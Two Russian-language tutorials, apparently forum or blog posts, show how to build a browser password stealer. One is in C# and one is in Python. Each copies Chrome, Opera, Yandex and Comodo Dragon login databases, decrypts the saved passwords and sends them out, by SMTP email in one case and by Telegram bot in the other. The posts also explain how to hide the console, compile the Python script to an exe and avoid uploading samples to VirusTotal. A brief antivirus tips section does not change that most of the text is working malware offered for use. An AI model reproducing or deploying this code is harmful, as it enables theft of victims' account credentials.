Как написать свой стиллер

Есть такой класс вирусов, призванных получать у пользователя конкретные (или какие угодно) файлы и направлять их специально уполномоченным людям. Этот класс вирусов называют Stealer. Основной их целью является добыча полезной информации с компьютера жертвы для последующей продажи или собственного использования . Сегодня мы напишем этот вирус на C#.

Как работает наш стиллер?

• Сначала стиллер проверяет наличие браузерных папок.
• Если файл содержащий пароли существует, идёт проверка на их содержание.
• Если данные не пусты, стиллер добавляет их в текстовой файл.
• После того, как стиллер закончил проверку, он отправляет данные прямо к нам в руки.

Приступим!
Для начала создаём проект в Visual Studio. Версия фреймворка — 4.5.

Program.cs
Добавим необходимые юзинги:

using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Net;
using System.Net.Mail;
using System.Text;
using System.Threading.Tasks;

Начинаем кодить, для начала мы создадим папку где будет лежать файл с паролем:

Directory.CreateDirectory(Path.GetTempPath() + "StealLog");

Папка будет создана в каталоге TEMP.

Создадим переменную paths в которой хранятся пути к файлам Login Data (Файлы Login Data содержат пароли):

string[] paths = {
Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"GoogleChromeUser DataDefaultLogin Data",

Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"YandexYandexBrowserUser DataDefaultLogin Data",

Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"Opera SoftwareOpera StableLogin Data"
};

Теперь создаём переменную pwd_text которая пока что ничему не равна:

Добавим в код следующие, объяснение кода в комментариях:

foreach (string p in paths) //идем по папкам
{
var pas = Passwords.ReadPass(p);
if (File.Exists(p)) // если файл с паролями существует, то выполняем следующие действия
{
pwd_text += "Stealer by: @deepsidernrn";
foreach (var item in pas)
{
if ((item.Item2.Length > 0) && (item.Item2.Length > 0)) // если значения логина и пароля не пустые, то заносим их в переменную 
{
pwd_text += "URL: " + item.Item1 + "rn" + "Login: " + item.Item2 + "rn" + "Password: " + item.Item3 + "rn";
pwd_text += " rn";
}
}
}
}

Делаем проверку, если файл Login Data находится в нашей папке, то удаляем его.

if (File.Exists(Path.GetTempPath() + @"StealLog
Login Data"))
{
  File.Delete(Path.GetTempPath() + @"StealLog
Login Data");
}

Запишем все пароли в .txt файл:

File.WriteAllText(Path.GetTempPath() + @"StealLog
Passwords.txt", pwd_text);

Passwords.cs
Создаём новый класс с именем Passwords.cs.

Добавляем туда этот код, объяснение в комментариях:

static public IEnumerable<Tuple<string, string, string>> ReadPass(string dbPath)
{
if (File.Exists(Path.GetTempPath() + @"StealLog
Login Data")) // Если файл по данному пути существует, то удаляем его
{
File.Delete(Path.GetTempPath() + @"StealLog
Login Data");
}
File.Copy(dbPath, Path.GetTempPath() + @"StealLog
Login Data"); // копируем файл с паролями для того, чтобы не закрывать браузер
dbPath = Path.GetTempPath() + @"StealLog
Login Data";
var connectionString = "Data Source=" + dbPath + ";pooling=false";
using (var conn = new System.Data.SQLite.SQLiteConnection(connectionString))
using (var cmd = conn.CreateCommand())
{
cmd.CommandText = "SELECT password_value,username_value,origin_url FROM logins";
conn.Open();
using (var reader = cmd.ExecuteReader())
{
while (reader.Read())
{
var encryptedData = (byte[])reader[0];
var decodedData = System.Security.Cryptography.ProtectedData.Unprotect(encryptedData, null, System.Security.Cryptography.DataProtectionScope.CurrentUser); // расшифровка паролей
var plainText = Encoding.ASCII.GetString(decodedData);
yield return Tuple.Create(reader.GetString(2), reader.GetString(1), plainText);
}
}
conn.Close();
}
}

Появились ошибки, исправляем их, добавим ссылку:

Проект — Добавить ссылку. Ищем System.Security

Для работы с Login Data установим библиотеку:

Проект — Управление пакетами Nuget. Ищем в поискe «sqlite» и устанавливаем пакет

Теперь нам нужно отправить файл с паролями. Возвращаемся к Program.cs и добавляем следующий код:

SmtpClient Smtp = new SmtpClient("smtp.mail.ru", 587); // Создаём Smpt соединения с почтой mail.tu

Smtp.Credentials = new NetworkCredential("почта@mail.ru", "пароль"); // Меняем на своё, можно создать левую почту.

Smtp.EnableSsl = true;
MailMessage Message = new MailMessage();
Message.From = new MailAddress("почта@mail.ru"); // Кому отправляем
Message.To.Add("почта@mail.ru");
Message.Subject = "Log | @deepside"; // Заголовок письма
Message.Body = "Stealer by DEEPSIDE"; // Текст письма
(new Attachment(Path.GetTempPath() + @"RebornExodusPasswords.txt")); // Добавляем вложение с логом
Smtp.Send(Message); // Отправляем

Формат письма:

Формат лога:

Лог приходит значит мы на верном пути. Теперь нам нужно кое что исправить. Наверное ты заметил, что при запуске стиллера выводится консоль. Как это исправить?

Заходим в свойства проекта, далее делаем как на скрине:

Выбираем «Приложение Windows». Теперь консоль не открывается и стиллер запускается скрытно.

Итог. Что мы имеем?
Вес стиллера ~ 10kb.

Детекты:

Стиллер на VirusTotal не заливать! Проверять можно тут.

Защита.
Для начала нужно поставить хороший антивирус, ведь он хоть как-то защищает. Без антивируса вы будете «ловить» все подряд. В Интернете часто пишут, что такое стиллер и как его создать, даже предоставляют программы для их создания. Но зачастую программы не работают, а в них самих есть стиллер. Каждый скачиваемый файл нужно проверить обязательно, чтобы не потерять свои данные. Также существуют программы, которые удаляют стиллер с компьютера. Рекомендуется еще проверять ПК на наличие вирусов с помощью специальных утилит, например, DrWeb Cure It.

Как понять что ты заражён стиллером?

• Для начала , нужно понять, остался ли стиллер в автозагрузке, думаю это расписывать не нужно, если остался, то конечно выключаем. Если нет, выходим.
• Дальше, в диспетчере задач, ищем процессы, с ключевыми словами — Stealer, Passview. Так же , бывает скрытые процессы, для этого идем в службы, ищем там, те же ключевые слова.
• Выключаем службы, убираем автозапуск.

Заключение.
Сегодня мы написали Stealer на C#, рассмотрели его возможное внутреннее устройство и преследуемые цели. Думаю каждый начинающий кодер открыл для себя что то новое, удачи.

Весь код Program.cs — тут

Весь код Passwords.cs — тут

Привет. Пришло время написать свой собственный стиллер на чудном языке Python. Оформление,заголовки и куски текста, я буду брать из своей прошлой статьи, ибо есть повторяющееся моменты, а делать рерайт на них, я не вижу смысла)
Словарик с терминами,которые я буду использовать, можно найти по ссылке — ТЫК
Комментарии будут отмечены решеточкой — #

Переходим на официальный сайт PythonА — ТЫК. Скачиваем 3+ версию и устанавливаем ее.

Программа проверит наличие папок от указанных браузеров, при наличии — подключится к базе данных(LoginData) и достанет от туда сохраненные логины,пароли от сайтов. После полученные данные программа отправит от имени бота в чат телеграм. Вот и все)

Как по мне, очень удобно при частом пребывании в телеграме получать в личные сообщения логи со стиллера. Поэтому мы создадим своего бота, который будет нам отправлять украденные логины и пароли.
Для начала мы должны создать нашего бота, в этом нам поможет @BotFather, запускаем с ним диалог и создаем нового бота,которому мы должны придумать имя с окончанием «_bot«. После BotFather выдаст нам token для управления нашим ботом.

После всех вышеперечисленных действий мы должны перейти по ссылке, отправить боту любое сообщение с нужного вам аккаунта и обновить открытый сайт, в итоге мы получим кучу разных данных, в которых нам нужно найти и сохранить chat id.

https://api.telegram.org/botВашToken/getUpdates #перейти по данной ссылке
"chat":{"id":вашid #найти chatid в информации

С ботом мы разобрались, идем дальше.

Сначала нам нужно установить библиотеки, которые будут использованы в нашей программе
Для этого запустим терминал(cmd) и обновим питоновский установщик пакетов.

pip install --upgrade pip

После обновления установим 2 нужные нам библиотеки,pyTelegramBotAPI pywin32 и telebot

pip install pyTelegramBotAPI
pip install pywin32
pip install telebot

______________________________________________________________________________________
В самом начале программы, мы должны подключить библиотеки, которые мы будем использовать в нашем коде.

from os import getlogin #из библиотеки os мы импортируем функцию getlogin
#данная библиотека поможет нам получить имя пользователя компьютера
import sqlite3 #импортируем библиотеку sqlite3
#данная библиотека даст возможность работать с базами данных
import win32crypt #импортируем библиотеку win32crypt
#эта библиотека поможет расшифровать пароли из базы данных
import telebot #импортируем библиотеку telebot
#с помощью этой библиотеки мы будем отправлять сообщения от нашего бота.

_______________________________________________________________________________
Теперь нам нужно задать переменные, которые мы будет использовать.

t0ken = "ВАШ:Т0КЕН"" #переменная t0ken – в которой хранится token от бота
b0t = telebot.TeleBot(t0ken) #создаем переменную b0t – которая отвечает за создание бота и имеет атрибут в виде переменной t0ken
i=0 #переменная счетчик
name_0f_user = getlogin() # переменная, которая с помощью функции getlogin получает имя учетной записи пользователя.

_______________________________________________________________________________
Дальше мы должны создать переменные,списки с директориями возможных браузеров.

op3ra = "C:\Users\" + name_0f_user + "\AppData\Roaming\Opera Software\Opera Stable\" + "Login data"
#переменная op3ra которая равна такому пути C:\Users\Users\AppData\Roaming\Opera Software\Opera Stable\LoginData - где Login Data - база данных, а остальное - путь к папке браузера.
g00gle = "C:\Users\" + name_0f_user + "\AppData\Local\Google\Chrome\User Data\Default\" + "Login Data" #также как и выше
yand3x = "C:\Users\" + name_0f_user + "\AppData\Local\Yandex\YandexBrowser\User Data\Default\" + "Login Data" #также как и выше
c0m0d0drag0n = "C:\Users\" + name_0f_user + "\AppData\Local\Comodo\Dragon\User Data\Default\" + "Login Data" #также как и выше
lsdir=[op3ra,g00gle,yand3x,c0m0d0drag0n] #создаем список в котором хранятся наши переменные с директориями браузеров.
lsbr0wser=["Opera","Google Chrome","Yandex Browser","Comodo Dragon"] #создаем список с названиями браузеров, которые у нас есть. Названия расположены в порядке списка lsdir

Я добавил только 4, как по мне самых распространенных браузеров. Вы можете сами добавлять другие браузеры на движке Chromium
При добавлении/редактировании директорий, нужно использовать двойной, обратный слэш(\), иначе будет выбивать ошибку,связанную с кодировкой.
_______________________________________________________________________________
Теперь приступим к расшифровке паролей и отправке полученных данных в телеграм.

b0t.send_message(ваш id, "Компьютер: " + name_0f_user) #для начала мы отправим в чат имя системы жертвы
#b0t - имя бота,которого мы создали в начале
#send_message - функция для отправки сообщения,которая принимает такие аргументы: id чата,который мы получили ранее и текст,который мы желаем отправить, в данном случае, слово "Компьютер:"  объединенное с переменой name_0f_user
for i in range(len(lsdir)): #запускаем цикл, который будет длится от переменной i до длины списка lsdir, от 0 до 4
    try: #попробовать сделать следующие действия, если не получится, то выполнить действия после except
        br0wser=lsdir[i] #переменной br0wser присвоим элемент списка под номером [i]
        connecti0n = sqlite3.connect(br0wser) #начинаем работу с sqllite, создаем переменную, которая равняется подключению базы данных, которая находится по адресу br0wser
        curs0r = connecti0n.cursor() #создаем переменную curs0r, которая отвечает за создание объекта для взаимодействия с базой данных
        curs0r.execute('SELECT origin_url, username_value, password_value FROM logins') #переменной curs0r мы говорим достать из базы данных нам такие значения - origin_url(ссылка на сайт где был введен логин и пароль),username_value(логин), password_value(пароль)
         for ii in curs0r.fetchall(): #создаем цикл, который будет длится от нуля(ii), до всех значений, которые можно получить из базы данных(curs0r.fetchall)
             d3cryptpass = win32crypt.CryptUnprotectData(ii[2]) #переменной d3cryptpass присваиваем значение расшифровки пароля(второго элемента в списке значений, добытых из базы данных), функцией CryptUnprotectData(библиотека win32crypt)
             b0t.send_message(id_вашего_чата, lsbr0wser[i]) #в чат от имени бота отправляем сообщение с i-тым элементом из списка текстовых названий браузеров.
             b0t.send_message(id_вашего_чата, "----------------------------") #отправляем от имени бота сообщение в чат с разделительной линией/украшением
             b0t.send_message(id_вашего_чата, "Сайт: " + ii[0]) #в чат от имени бота отправляем слово "сайт" + нулевой элемент в списке
             b0t.send_message(id_вашего_чата, "----------------------------") #отправляем от имени бота сообщение в чат с разделительной линией/украшением
             b0t.send_message(id_вашего_чата, "Логин: " + ii[1]) #в чат от имени бота отправляем слово "логин" + первый элемент в списке
             b0t.send_message(id_вашего_чата, "----------------------------") #отправляем от имени бота сообщение в чат с разделительной линией/украшением
             d3cryptpass=str(d3cryptpass) #переменной d3cryptpass- присваиваем значение d3cryptpass, только переводим ее в текстовый тип данных(str)
             b0t.send_message(id_вашего_чата, "Пароль: " + d3cryptpass) #в чат от имени бота отправляем слово "пароль" + переменную d3cryptpass
             b0t.send_message(id_вашего_чата, "----------------------------") #отправляем от имени бота сообщение в чат с разделительной линией/украшением
    except: #если действие после try не заработало/выдало ошибку, то выполнить действие после except
        b0t.send_message(id_вашего_чата,"Браузер " + lsbr0wser[i] + " был запущен, или не установлен") #в чат от имени бота отправляем слово "браузер" + i-тый элемент в списке с названиями браузеров(lsbr0wser) + сообщение об ошибке

Теперь я попытаюсь объяснить суть вышеописанного кода на «простом« примере)

​

Ясное дело, что python скрипт мы не будем распространять, поэтому мы скомпилируем его в exe файл. Для компиляции нам нужно будет установить специальную утилиту pyinstaller для компиляции py в exe

После установки мы должны открыть папку с нашей программой на питоне и запустить pyinstaller с такими аргументами

-F соберет все файлы в один exe файл
-w отключит консоль
-i *путь к иконке* аргумент,который подключит к программе иконку​

CD C:compile
pyinstaller -i i.ico -F -w stealer.py
#В терминала переходим в папку C:compile
#вызываем pyintaller, где i.ico - иконка расположенная в папке compile;stealer.py - наш питоновский скрипт, расположенный в папке compile

После в папке dist появится наш код скомпилированный в EXE. У меня готовый стиллер запускается за 5 секунд и имеет вес в 6 мегабайт.
Проверить на детекты, я не смог, ибо viruschekmate,ScanMyBin — сдохли,nodstribute+virustotal — сливают данные(не суйте туда стиллер)), поэтому информация про «чистоту» остается для вас и для меня интригой)

Исходники вы можете скачать по ссылке — ТЫК
Так приходят логи, пароль находится между символом b’ и ‘
Вот мы и написали наш простой стиллер, мы смогли уложится в 34 строчки кода. Надеюсь вам все было понятно, пытался писать как можно проще. Если будет интересно, могу объяснить как добавить фейк ошибку при запуске стиллера)
Если вам что-то не понравилось, или есть идеи по улучшению — прошу сообщить об этом
P.S.
Словарик дополню новыми терминами